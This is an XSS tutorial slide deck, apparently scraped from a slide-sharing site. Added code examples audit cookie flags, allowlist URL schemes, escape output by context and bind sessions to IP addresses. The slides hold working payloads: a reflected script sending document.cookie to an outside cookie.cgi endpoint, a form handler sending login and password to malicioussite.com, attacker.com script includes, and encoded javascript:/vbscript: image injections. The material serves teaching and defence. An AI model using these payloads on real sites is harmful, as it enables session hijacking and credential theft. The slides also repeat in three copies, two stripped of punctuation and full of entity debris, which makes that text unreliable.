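  // from most cross-site requests (limits CSRF; does nothing against XSS).
  // Max-Age: bounds how long a captured token stays valid.
  return `${name}=${encodeURIComponent(value)}; Path=/; Max-Age=${maxAgeSeconds}; ` +
         'HttpOnly; Secure; SameSite=Lax';
}

// Parse one Set-Cookie header into { name, value, attributes }; attribute
// names are lower-cased and flag attributes become true.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: eq === -1 ? pair : pair.slice(0, eq),
    value: eq === -1 ? '' : pair.slice(eq + 1),
    attributes: {},
  };
  for (const attr of rest) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    cookie.attributes[key] = i === -1 ? true : attr.slice(i + 1).trim();
  }
  return cookie;
}

// Findings for a header that carries a session token; empty means clean.
function auditSetCookie(header) {
  const { attributes } = parseSetCookie(header);
  const findings = [];
  if (!attributes.httponly) {
    findings.push('missing HttpOnly: script, including injected script, can read the cookie');
  }
  if (!attributes.secure) {
    findings.push('missing Secure: the cookie is also sent over plain HTTP');
  }
  const sameSite = String(attributes.samesite || '').toLowerCase();
  if (sameSite === '' || sameSite === 'none') {
    findings.push('SameSite absent or None: the cookie rides along on cross-site requests');
  }
  return findings;
}

// Model of what document.cookie exposes: every cookie except HttpOnly ones.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.attributes.httponly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Constructed sample: a legacy header next to the hardened one.
const LEGACY_HEADER = 'JSESSIONID=abc123; Path=/';
const HARDENED_HEADER = sessionCookieHeader('sid', 'abc123');

console.log(auditSetCookie(LEGACY_HEADER));   // three findings
console.log(auditSetCookie(HARDENED_HEADER)); // []
console.log(scriptVisibleCookies([LEGACY_HEADER, HARDENED_HEADER])); // JSESSIONID=abc123
```

HttpOnly closes the document.cookie leak shown on slide 35 but nothing more: script injected into the page can still submit forms and fetch pages in the victim's session, which is why output encoding, not cookie flags, is the primary defence.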

31

Disabling scripts…

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis.

Functionality that blocks all scripting and external inclusions by default and then lets the user enable it per domain is more effective…

Problems with this: a substantial reduction in functionality and responsiveness. Many sites do not work without client-side scripting, forcing users to disable the protection for that site and opening their systems to the threat.

32

The easiest way to protect yourself as a user is to follow only links from the main website you wish to view, and to use that site's own search to find the content.

33

For explanation purposes…

Remember the syntax…

34

SYNTAX: script injection in an image src tag

• Embed nested quotes: ' or " or \u0022 \u0027
• Keyword filters that allow any JS to execute are useless: A = 'navi'; B = 'gator.userAgent'; alert(eval(A+B))
• Limited input length + embedding a script block = unlimited script power (<script src=...>)
• SSL pages warn if a script src comes from an untrusted site, but not if you can upload, say, an image that is actually JS commands
• Methods of script encoding:
  <img src="vbscript:do&#x63;ument.lo&#x63;ation='http://ab.com'">
  <IMG SRC="javascript:alert('test')">
  <IMG SRC="javasc ript:alert('test')"> (whitespace such as a tab or newline splits the keyword)
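The keyword filter the slide calls useless, tried against the slide's own encoded payloads, and the check that does work for a URL-valued attribute such as an img src, as an added example that is not code from the presentation. It decodes character references, normalises the scheme the way a browser does, and then allows only http and https (or a relative URL). It is a Node.js script with no dependencies. The payload strings are reconstructed from the slide; the vbscript one additionally has its scheme entity-encoded (vbs&#x63;ript:), a variation of the slide's payload chosen so that a filter matching the literal vbscript: does not strip it.

```javascript
// Added example, not code from the presentation: a keyword blacklist of the
// kind the slide calls useless, against the slide's encoded payloads, and
// an allowlist check on the effective URL scheme. Node.js, no dependencies.
// Payload strings are reconstructed from the slide (the vbscript one with
// its scheme entity-encoded as well).

// A blacklist filter of the kind many old applications used.
function naiveKeywordFilter(s) {
  return s.replace(/javascript:|vbscript:|<script|document|location/gi, '');
}

// Decode decimal (&#99;) and hex (&#x63;) numeric character references,
// so that "do&#x63;ument" becomes "document" before any check is made.
function decodeNumericEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
}

// Browsers ignore ASCII whitespace and control characters inside a URL
// scheme, which is why "javasc\nript:" still runs. Return the scheme as
// the browser would see it, or null for a relative URL.
function effectiveScheme(url) {
  const decoded = decodeNumericEntities(url);
  const m = /^[\s\x00-\x1f]*([a-z][a-z0-9+.\-\s\x00-\x1f]*):/i.exec(decoded);
  return m ? m[1].replace(/[\s\x00-\x1f]/g, '').toLowerCase() : null;
}

// Allowlist: relative URLs and explicit http/https only.
function isSafeUrl(url) {
  const scheme = effectiveScheme(url);
  return scheme === null || scheme === 'http' || scheme === 'https';
}

// Compare both checks on one value.
function evaluateUrl(url) {
  return {
    naiveFilterBlocks: naiveKeywordFilter(url) !== url,
    allowlistAccepts: isSafeUrl(url),
  };
}

// Constructed inputs: the three slide payloads and two legitimate URLs.
const SAMPLES = [
  "javascript:alert('test')",
  "javasc&#x0A;ript:alert('test')",
  "vbs&#x63;ript:do&#x63;ument.lo&#x63;ation='http://ab.com'",
  'http://legitimateSite.com/registration.cgi?clientprofile=x',
  '/search?q=javascript',
];

for (const s of SAMPLES) console.log(JSON.stringify(s), evaluateUrl(s));
// Only the first payload is stopped by the keyword filter; the allowlist
// rejects all three payloads and accepts both legitimate URLs.
```

The allowlist works because it decides on what the browser will execute rather than on what the string looks like: decoding and normalisation happen first, and anything that is not plainly http, https or relative is refused. The blacklist fails for the opposite reason, since there is always one more encoding it does not know about.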

35

Types of information leakage

Client can reveal cookies to a 3rd party (session state, order info, etc.):

http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

Client can reveal posted form items to a 3rd party (user ID, password, etc.):

<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;" </form>

Client can be tricked into accessing/posting spoofed info to a trusted server:

www.trustedserver.com/xss.asp?name = <iframe src="http://www.trustedserver.com/auth_area/orderupdate?items=4000"></iframe>

36

You can find examples of XSS on these websites:

1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt

2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt

3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt

37

Related vulnerabilities

Several classes of vulnerabilities or attack techniques are related to XSS. Cross-zone scripting exploits the zone concept of certain browsers and usually executes code with greater privilege.[31] HTTP header injection can be used to create cross-site scripting conditions because of escaping problems at the HTTP protocol level (in addition to enabling attacks such as HTTP response splitting).[32]

Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS: rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.[33]

Lastly, SQL injection exploits a vulnerability in the database layer of an application: when user input is incorrectly filtered, arbitrary SQL statements can be executed by the application.

Page 7: Internet hacking presentation

7

Threats helliphelliphelliphelliphellip

Taking over the user session before the users session cookie expires

Connect users to a malicious server of the attackers choice

Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results

(GMAIL example)

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 8: Internet hacking presentation

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 9: Internet hacking presentation

9

• XSS is an application level attack which involves 3 parties

• We can load an external script with a <script src="xxx"> tag

• Script content can be loaded from anywhere (RPC/Remote scripting is common)

• Most attacks are only focused on collecting cookies

• Attacker does not know the actual responses to the client

• We can leak contents of pages, form values, results from submits and javascript vars as URL parameters with <image>, <script> and other tags that refer to the attacker's site

10

Types of XSS Attacks

11

Non-Persistent

• It is the most common type. These holes show up when data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the response.

• Because HTML documents have a flat, serial structure that mixes control statements, formatting and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection.

12

Persistent…

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is online message boards where users are allowed to post HTML-formatted messages for other users to read.

13

Examples of attacks……

14

Scripting Via Malicious Link…

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing a malicious link with scripting, like:

<A HREF="http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>

When a user clicks on this link, the URL is sent to the site, including the malicious code. If the legitimate server sends a page back to the user including the value of clientprofile, the malicious code will be executed in the client Web browser.

16

Stealing User's COOKIE…

17

If any part of the Web site uses cookies, then it may be possible to steal them from its users. In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable. When the page is displayed, the malicious script runs, collects the user's cookies and sends a request to the attacker's Web site with the cookies gathered. Using this technique the attacker can gain sensitive data such as passwords, credit card numbers and any arbitrary information the user inputs.

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message. Because the malicious scripts are executed in a context that appears to have originated from the legitimate server, the attacker has full access to the document retrieved and may send data contained in the page back to their site. If the embedded script code has additional capability to interact with the legitimate server without alerting the victim, the attacker could build on that and post data to a different page on the legitimate Web server.

20

By Scripting

21

Script can read all HTML content/tags in the other window

Script can set/delete tags/content in the other window. We can read and set form values, then run a submit()

Script can set vars and call functions in the other window

Document.write can allow a script to create new tags/content in the other window

This means that a script can read all HTML contents of a document, change the appearance of the document, modify existing tags and values, and modify and submit forms. We have full control of the other window as long as it's in the same document.domain.

If we can forward cookies, then we can also forward other jscript-accessible content to an attacker. We can forward page contents, form values (including hidden…), jscript vars/state and jscript errors.

22

Some FACTS about the XSS attacks……

23

By SURVEY……

1st Gen XSS was against public sites and ran against everyone that visited the site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

• Cross-site scripting attacks are a special case of code injection

• Cross-site scripting carried out on websites was roughly 80% of all security vulnerabilities documented by Symantec as of 2007

• Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data

Dynamic XSS with 2-way comms (diagram)

Victim Browser: XSS against site; an IFRAME in which script commands run and into which other documents on the site are loaded; <script src="attacker.com/innerHTML_of_IFRAME">

XSS Vulnerable Server

Attacker System: New jscript…; <script src="attacker.com">

26

Some prominent sites that have been affected in the past are……

The search engine Google, the email services of Google and Yahoo, and the social networking sites Facebook, MySpace and Orkut. The developers of MediaWiki have fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users.

Researchers have claimed that as many as 68% of websites are likely open to XSS attacks.

27

By seeing all this, the question that arises is……

Then how can we prevent it?

28

Yes, some methods are there for prevention, and those are:

>> Filtering
>> Cookie Security
>> Disabling Scripts
>> Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields, or to escape all untrusted data using a method appropriate for the output context. There are several different escaping schemes that must be used depending on where the untrusted string needs to be placed, including HTML numeric entity encoding, JavaScript escaping, CSS escaping and URL encoding. Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner.
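A worked version of the two slides above, added here and not part of the presentation: the reflected clientprofile page from the "Scripting Via Malicious Link" slide, rendered first without escaping and then with the per-context escaping the Filtering slide calls for. The function names and the sample input are constructed for this example.

```python
# Added example (not from the presentation). Shows the vulnerable "copy the
# parameter into the page" pattern beside a version that escapes the same
# value differently for each output context it lands in.
import html
import json
from urllib.parse import quote

# Constructed sample input: the kind of value a crafted link carries.
TAINTED = '<SCRIPT>alert("x")</SCRIPT>'


def render_unsafe(clientprofile: str) -> str:
    """The vulnerable pattern: untrusted input copied straight into HTML."""
    return f"<p>Welcome back, {clientprofile}</p>"


def escape_html(s: str) -> str:
    """HTML body and quoted-attribute context: &, <, >, \", ' become entities."""
    return html.escape(s, quote=True)


def escape_js_string(s: str) -> str:
    """JavaScript string-literal context.

    json.dumps yields a quoted, backslash-escaped literal; "</" is additionally
    broken up so the literal can never close the enclosing <script> element.
    """
    return json.dumps(s).replace("</", "<\\/")


def escape_url_component(s: str) -> str:
    """URL query-parameter context: percent-encode everything but unreserved."""
    return quote(s, safe="")


def render_safe(clientprofile: str) -> str:
    """Same page, each placeholder escaped for the context it is placed in."""
    return (
        f"<p>Welcome back, {escape_html(clientprofile)}</p>\n"
        f'<a href="/registration.cgi?clientprofile='
        f'{escape_url_component(clientprofile)}">again</a>\n'
        f"<script>var profile = {escape_js_string(clientprofile)};</script>"
    )


def reflected_unescaped(page: str, value: str) -> bool:
    """True when the raw input survives verbatim somewhere in the output."""
    return value in page


if __name__ == "__main__":
    print("unsafe reflects raw input:", reflected_unescaped(render_unsafe(TAINTED), TAINTED))
    print("safe reflects raw input:  ", reflected_unescaped(render_safe(TAINTED), TAINTED))
    print(render_safe(TAINTED))
```

Note that the escaping function is chosen by where the value is written, not by what the value looks like; a single "strip < and >" filter would leave the JavaScript and URL contexts open.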

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal these cookies. To mitigate this particular threat, many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie.
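The IP-binding mitigation just described, as an added example that is not code from the presentation: a minimal server-side session table that records the address seen at login and refuses the cookie from any other address. Class and method names, the time values and the sample addresses are constructed.

```python
# Added example (not from the presentation): session cookies bound to the
# login IP address, as the Cookie Security slide describes.
import secrets
import time


class SessionStore:
    """In-memory session table: session id -> (user, bound_ip, expires_at)."""

    def __init__(self, ttl_seconds: int = 1800):
        self.ttl = ttl_seconds
        self._sessions = {}

    def login(self, user: str, client_ip: str, now=None) -> str:
        """Create a session for `user` and bind it to the address that logged in."""
        now = time.time() if now is None else now
        sid = secrets.token_urlsafe(32)  # 256-bit unguessable cookie value
        self._sessions[sid] = (user, client_ip, now + self.ttl)
        return sid

    def lookup(self, sid: str, client_ip: str, now=None):
        """Return the user if the cookie is valid for this client, else None.

        A cookie presented from an address other than the one bound at login
        is treated as stolen: the session is revoked so the legitimate user is
        logged out rather than silently shadowed by whoever replayed it.
        """
        now = time.time() if now is None else now
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        user, bound_ip, expires_at = entry
        if now >= expires_at:
            del self._sessions[sid]
            return None
        if client_ip != bound_ip:
            del self._sessions[sid]
            return None
        return user

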